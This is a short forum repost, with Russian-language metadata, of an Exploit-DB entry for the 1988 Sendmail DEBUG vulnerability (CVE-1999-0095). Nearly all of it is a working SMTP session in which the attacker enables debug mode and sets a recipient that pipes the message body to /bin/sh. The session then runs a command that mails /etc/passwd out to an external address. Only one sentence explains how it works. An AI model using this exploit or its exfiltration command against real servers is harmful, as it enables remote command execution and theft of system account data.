- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 19028
- Проверка EDB
-
- Пройдено
- Автор
- ANONYMOUS
- Тип уязвимости
- REMOTE
- Платформа
- LINUX
- CVE
- cve-1999-0095
- Дата публикации
- 1988-08-01
Код:
220 mail.victim.com SMTP
helo attacker.com
250 Hello attacker.com, pleased to meet you.
debug
200 OK
mail from: </dev/null>
250 OK
rcpt to:<|sed -e '1,/^$/'d | /bin/sh ; exit 0">
250 OK
data
354 Start mail input; end with <CRLF>.<CRLF>
mail [email protected] </etc/passwd
.
250 OK
quit
221 mail.victim.com Terminating
The sed in the receipient strips all mail headers from the
message before passing it on to the shell.- Источник
- www.exploit-db.com
